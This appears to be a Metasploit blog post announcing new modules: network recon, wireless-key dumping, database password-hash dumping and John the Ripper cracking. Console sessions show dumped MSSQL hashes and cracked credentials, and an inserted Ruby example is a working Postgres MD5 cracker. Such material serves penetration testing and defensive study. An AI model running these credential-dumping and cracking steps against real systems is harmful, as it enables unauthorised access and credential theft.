The Metasploit Framework continues to grow and expand with the support of the community. There have been many new features added to the Metasploit Framework over the past month. I am very excited to be able to share some of these new developments with you.

Mubix's Recon Modules

Mubix's post-exploitation modules from his Derbycon talk are now in the repository. The resolve_hostname module, originally called 'Dig', takes a given hostname and resolves its IP address from the Windows victim. The enum_termserv module dumps Windows RDP connections from the victim machine, to give you a list of other potential targets. The computer_browser_discovery module, formerly called netdiscovery, taps the victim machine's Computer Browser Service via Railgun. This returns a list of all machines available on the same broadcast domain as the victim machine. An addition to Mubix's original module gives users the option to create host records in the Metasploit database for any hosts discovered this way.

[*] [2011.12.05-15:35:57] Found 4 systems.
[*] [2011.12.05-15:36:02] Netdiscovery Results
====================
TYPE     IP            COMPUTER NAME   VERSION  COMMENT
----     --            -------------   -------  -------
69635    192.168.2.35  WINXPTEST       5.1
69635    192.168.2.9   MELODIE         6.1
8556551  DMALONEY-VDSDA  5.2

Windows Wireless LAN

There is a new group of Windows post modules under post/windows/wlan. These modules all use Railgun to call into the Windows WLAN API. There are currently four modules in this group:

wlan_profile: This module enumerates all of the wireless LAN interfaces on the machine, then enumerates all the saved wireless profiles on each interface. If the Meterpreter session has sufficient privileges it will also decrypt the wireless key material. One caveat to this last part is that Windows XP does not actually store the WPA passphrase; it stores the key derived from it with the PBKDF2() function. Since this is all Windows stores, the key is still usable in this format, but it does you no good from a password-reuse standpoint. On the TODO list is another module that will make the victim machine connect to a specific network, with the option of using one of the pre-saved profiles or passing it your own profile.

msf  post(wlan_profile) > set SESSION 1
SESSION => 1
msf  post(wlan_profile) > exploit
[+] Wireless LAN Profile Information
GUID: {eb566b46-0140-4eca-800a-a5e01fae7251} Description: Intel(R) Centrino(R) Advanced-N 6230 State: The interface is connected to a network.
Profile Name: derbycon
derbycon
6465726279636F6E
derbycon
ESS
auto
WPA2PSK
AES
false
passPhrase
false
derbycon
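The Windows XP caveat above, as an added Ruby example that is not part of the wlan_profile module: what XP keeps is the 256-bit WPA PSK, which is PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID over 4096 iterations (IEEE 802.11i), so it is bound to one SSID and cannot be turned back into the passphrase. The SSID 'Skynet' and passphrase 'derbycon' are taken from the sample output; the function names are this example's own.

```ruby
require 'openssl'

# WPA/WPA2-Personal derives the Pairwise Master Key (the "PSK") from the
# passphrase with PBKDF2-HMAC-SHA1, salted with the SSID, 4096 iterations,
# 32 bytes of output (IEEE 802.11i). On Windows XP this derived value is what
# the saved profile holds in place of the passphrase.
WPA_ITERATIONS = 4096
WPA_KEY_BYTES  = 32

# Returns the PSK as the 64 hex characters a dumped XP profile would show.
def wpa_psk(passphrase, ssid)
  unless (8..63).cover?(passphrase.length)
    raise ArgumentError, 'WPA passphrase must be 8..63 characters'
  end
  raw = OpenSSL::PKCS5.pbkdf2_hmac_sha1(passphrase, ssid, WPA_ITERATIONS, WPA_KEY_BYTES)
  raw.unpack1('H*')
end

# Same passphrase, two SSIDs: the derived keys are unrelated. A recovered XP key
# therefore authenticates to the one network it was saved for and gives no
# evidence about whether the same passphrase is reused elsewhere.
def reuse_evidence(passphrase, ssid_a, ssid_b)
  { ssid_a => wpa_psk(passphrase, ssid_a), ssid_b => wpa_psk(passphrase, ssid_b) }
end

if __FILE__ == $0
  # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
  puts wpa_psk('password', 'IEEE')
  # Values from the sample output above (constructed pairing, not real loot)
  p reuse_evidence('derbycon', 'derbycon', 'Skynet')
end
```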

wlan_current_connection: This module will enumerate all of the wireless LAN interfaces on the victim machine, and then get information about the current wireless connection on each one. This information includes the MAC address of the access point, the SSID, the BSS type, the connection type, signal strength, RX/TX rates, security settings, encryption and authentication algorithms used, and whether 802.1x authentication is used on the network.

msf  post(wlan_current_connection) > set SESSION 1
SESSION => 1
msf  post(wlan_current_connection) > exploit
[+] GUID: {eb566b46-0140-4eca-800a-a5e01fae7251}
Description: Intel(R) Centrino(R) Advanced-N 6230
State: The interface is connected to a network.
Mode: connection initiated by wireless service automatically using a persistent profile.
Profile: Skynet
SSID: Skynet
AP MAC: xx:xx:xx:xx:xx:xx
BSS Type: Infrastructure
Physical Type: Extended rate PHY type
Signal Strength: 94
RX Rate: 54000
TX Rate: 54000
Security Enabled: Yes
oneX Enabled: No
Authentication Algorithm: WPA-PSK
Cipher Algorithm: TKIP
[*] WlanAPI Handle Closed Successfully
[*] Post module execution completed

wlan_bss_list: This module enumerates all of the wireless LAN interfaces on the machine, then scans with each interface for wireless networks and records the information about every network found. This includes much of the same information pulled down by the wlan_current_connection module.

msf  post(wlan_bss_list) > set SESSION 1
SESSION => 1
msf  post(wlan_bss_list) > exploit
[*] {"GetLastError"=>0, "return"=>0, "ppWlanBssList"=>5282784}
[*] Number of Networks: 16
[+] SSID: horton
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -90
Signal: 16
[+] SSID: Skynet
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: 802.11n PHY type
RSSI: -25
Signal: 99
[+] SSID: WIN_930
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -89
Signal: 18
[+] SSID: The Dragisic Network
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -86
Signal: 23
[+] SSID: jacob1
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -76
Signal: 40
[+] SSID: WIN_BA74
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -78
Signal: 36
[+] SSID: MonroeMFC
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -90
Signal: 16
[+] SSID: starmonster
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -81
Signal: 31
[+] SSID: Eric Home
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -87
Signal: 21
[+] SSID: linksys
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: High-rate DSSS (HRDSSS)
RSSI: -74
Signal: 43
[+] SSID: Tarheel_Country
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -72
Signal: 46
[+] SSID: W32.Blaster.Worm
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -80
Signal: 33
[+] SSID: Leidi
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -88
Signal: 20
[+] SSID: theriault
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: 802.11n PHY type
RSSI: -81
Signal: 31
[+] SSID: EckerNet
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -75
Signal: 41
[+] SSID: Belkin_G MIMO_Wireless_E5A125
BSSID: xx:xx:xx:xx:xx:xx
Type: Infrastructure
PHY: Extended rate PHY type
RSSI: -87
Signal: 21
[*] WlanAPI Handle Closed Successfully
[*] Post module execution completed

wlan_disconnect: This module takes an integer as an argument; that integer is the index of the interface you want to target. Most machines will likely only have one wireless interface, so this option can be left at the default value of 0. The module disconnects the specified wireless interface from whatever network it is currently connected to. This will be more useful once the module to connect the interface to a specified network is done.

Database Hash dumping

There are some interesting new auxiliary modules in the framework now too: hashdump modules for several of the more popular database servers, MSSQL, MySQL, Postgres, and Oracle. The modules take supplied credentials and log on to the database on a given port across a supplied RHOSTS list, then attempt to dump all of the database user password hashes. If that succeeds, the hashes are stored in a CSV as loot for further cracking. These modules also attempt to save all of the database, table, and instance names from the database, which are later used for wordlist building when attempting to crack the hashes.

msf  auxiliary(mssql_hashdump) > exploit
[*] Instance Name: "WINTEST2008"
[+] 192.168.2.13:1055 - Saving mssql05.hashes = sa:010051aa13a36f6efb5296ee8b804138173e0696d0892c52fcb6
[+] 192.168.2.13:1055 - Saving mssql05.hashes = ##MS_PolicyEventProcessingLogin##:010031b4ae8d43c66a1a17f5f5e7da86a1764dc48ddc6babdd9e
[+] 192.168.2.13:1055 - Saving mssql05.hashes = ##MS_PolicyTsqlExecutionLogin##:010094044117b73bd4051b810dab0b7db5e3cbd8bb402c36ffe0
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user1:01006dcfe5ee776f7fa8210a33c5bf2aaaef2b5ee25f315a2890
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user2:0100acc65dd1643d5a43320af56bc37861e6ba4af7b9a0e866ee
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user3:0100e838d7b99cedfb902161be09e3e859f2aca099f5eb49684b
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user4:0100a9ec455822cb06dcb752390725649dbf669aa1994669a1ce
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user5:0100a5a9092099814984bbbf0aa851477b5edbd1a5406ba1bebb
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user6:01001d924e4d071f25849387181a2c1b0336b60baecf3e78b874
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user7:01001e0a03d8f99fb1355ae09ebde36686f1041c072e4111f999
[+] 192.168.2.13:1055 - Saving mssql05.hashes = user8:0100c506c9b67d8592f9f36982c82f8907ac38258b1fe358a84c
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(mssql_hashdump) >

Linux unshadow

The auxiliary/analyze/jtr_unshadow module is another new addition. This module exists for scenarios where you can pull arbitrary files off victim machines in less standard ways, such as directory traversal attacks. It will take paths to locally stored passwd and shadow files. It will then unshadow the passwd file and store it as loot for future cracking.

New Password Cracking Options

Building on the success of our first John the Ripper (JtR) cracking module, we now have a few more. There are John the Ripper modules for cracking Microsoft SQL Server, MySQL, Oracle, and Linux hashes. The database modules look for hashes in the loot files created by the hashdump modules mentioned above. All of these modules assemble a wordlist based on a number of things:

  1. The default wordlist we ship with
  2. All usernames and passwords currently stored in the creds table
  3. All hostnames in the hosts table
  4. Any passwords already cracked by JtR (in the .pot file)
  5. Any captured MSSQL instance names
  6. Any database and table names gathered by db hashdump modules
  7. An optional user supplied wordlist

All of these items are pulled together and uniqued to create a wordlist for cracking. The module then attempts limited password cracking using this wordlist and some fast and easy cracking rules. These modules are not a thorough cracking attempt, but rather an attempt to crack the quick and easy hashes. Any hashes that are successfully cracked are then stored as creds in the database.

msf  auxiliary(mssql_hashdump) > use auxiliary/analyze/jtr_mssql_fast
msf  auxiliary(jtr_mssql_fast) > exploit
[*] Cracking MSSQL Hashes
[*] Cracking MSSQL05 Hashes
[*] HashList: /tmp/jtrtmp20111205-10995-2yklnu-0
[*] Trying Wordlist: /tmp/jtrtmp20111205-10995-1s8wt88-0
guesses: 5  time: 0:00:01:20 DONE (Mon Dec  5 15:13:41 2011)  c/s: 3436K  trying: étude1900
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: WINTEST2008      (user6)
[*] Output: password2        (user2)
[*] Output: password2        (user1)
[*] Output: user3            (user3)
[*] Output: password8        (user8)
[*] Trying Rule: All4...
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 0  time: 0:00:02:05 DONE (Mon Dec  5 15:15:47 2011)  c/s: 3947K  trying: |||}
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: Remaining 6 password hashes with 6 different salts
[*] Trying Rule: Digits5...
guesses: 0  time: 0:00:00:00 DONE (Mon Dec  5 15:15:47 2011)  c/s: 2898K  trying: 89092
[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])
[*] Output: Remaining 6 password hashes with 6 different salts
[*] user1:password2:192.168.2.13:1055
[*] user2:password2:192.168.2.13:1055
[*] user3:user3:192.168.2.13:1055
[*] user6:WINTEST2008:192.168.2.13:1055
[*] user8:password8:192.168.2.13:1055
[*]
[*] 5 password hashes cracked, 6 left
[*] 5 hashes were cracked!
[+] Host: 192.168.2.13 Port: 1055 User: user1 Pass: password2
[+] Host: 192.168.2.13 Port: 1055 User: user2 Pass: password2
[+] Host: 192.168.2.13 Port: 1055 User: user3 Pass: user3
[+] Host: 192.168.2.13 Port: 1055 User: user6 Pass: WINTEST2008
[+] Host: 192.168.2.13 Port: 1055 User: user8 Pass: password8
[*] Auxiliary module execution completed
msf  auxiliary(jtr_mssql_fast) >

One thing to note is that the jtr_linux module is not listed as fast mode. This is because this module can be very slow depending on the type of Linux hashes it is trying to crack. If the hashes were created using crypt(3) this module can be VERY slow.

There is also one other hash cracking module that does not use JtR: the postgres_md5_crack module. JtR currently does not support Postgres MD5 hashes. These hashes are created by taking the password, appending the username, and MD5 hashing the result. The postgres_md5_crack module generates a wordlist the same way the JtR modules do. It then takes each word, appends the username of the hash being tried, MD5 hashes it, and compares the result against the hash. If it matches, the discovered cred is saved in the database. This module can actually move surprisingly fast, but it is not necessarily a thorough cracking method.
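The wordlist assembly described under "New Password Cracking Options" and the Postgres MD5 check described just above, worked through as an added Ruby example that is not the postgres_md5_crack module's own code. It assumes the Postgres storage format "md5" + hex(MD5(password || username)); the seven source lists and the three role hashes are constructed sample data, not loot from a real target.

```ruby
require 'digest/md5'

# PostgreSQL stores a role's password as "md5" + hex(MD5(password || username));
# the username is the only salt, so the quality of the wordlist decides everything.
def postgres_md5(password, username)
  'md5' + Digest::MD5.hexdigest(password + username)
end

# Merge the wordlist sources the article lists and unique them. nil and empty
# entries (an unset optional user wordlist, for example) are dropped.
def build_wordlist(*sources)
  sources.flatten.compact.map(&:to_s).reject(&:empty?).uniq
end

# For each (username, stored hash) pair, append the username to every candidate,
# MD5 it and compare. Returns { username => cleartext } for the ones that match.
def crack_postgres_md5(hashes, wordlist)
  hashes.each_with_object({}) do |(user, stored), found|
    target = stored.sub(/\Amd5/i, '').downcase
    hit = wordlist.find { |w| Digest::MD5.hexdigest(w + user) == target }
    found[user] = hit if hit
  end
end

# Constructed sample data standing in for the seven sources (not real loot).
DEFAULT_WORDS  = %w[password 123456 letmein]  # 1. default wordlist
CREDS_TABLE    = %w[sa password2 user1]       # 2. usernames and passwords in creds
HOSTNAMES      = %w[WINTEST2008 MELODIE]      # 3. hosts table
POT_FILE       = %w[password2]                # 4. already cracked by JtR
INSTANCE_NAMES = %w[WINTEST2008]              # 5. captured MSSQL instance names
DB_OBJECTS     = %w[inventory orders]         # 6. db and table names from hashdump
USER_WORDLIST  = nil                          # 7. optional, unset here

SAMPLE_WORDLIST = build_wordlist(DEFAULT_WORDS, CREDS_TABLE, HOSTNAMES, POT_FILE,
                                 INSTANCE_NAMES, DB_OBJECTS, USER_WORDLIST)

# Constructed role hashes: two weak passwords present in the sources, one that is not.
SAMPLE_HASHES = {
  'report'   => postgres_md5('WINTEST2008', 'report'),
  'postgres' => postgres_md5('password2', 'postgres'),
  'admin'    => postgres_md5('kC7#vLq2!xR9pZm4', 'admin')
}

def demo_results
  crack_postgres_md5(SAMPLE_HASHES, SAMPLE_WORDLIST)
end

puts demo_results.inspect if __FILE__ == $0
```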

These are just some of the new features that have been added to the Metasploit Framework over the past month. Stay tuned as there are sure to be even more great new features coming. If there is something that Metasploit doesn't do, that you think it should, let us know. Better yet, try your hand at writing it yourself and send us a Pull Request on Github! Cheers for now.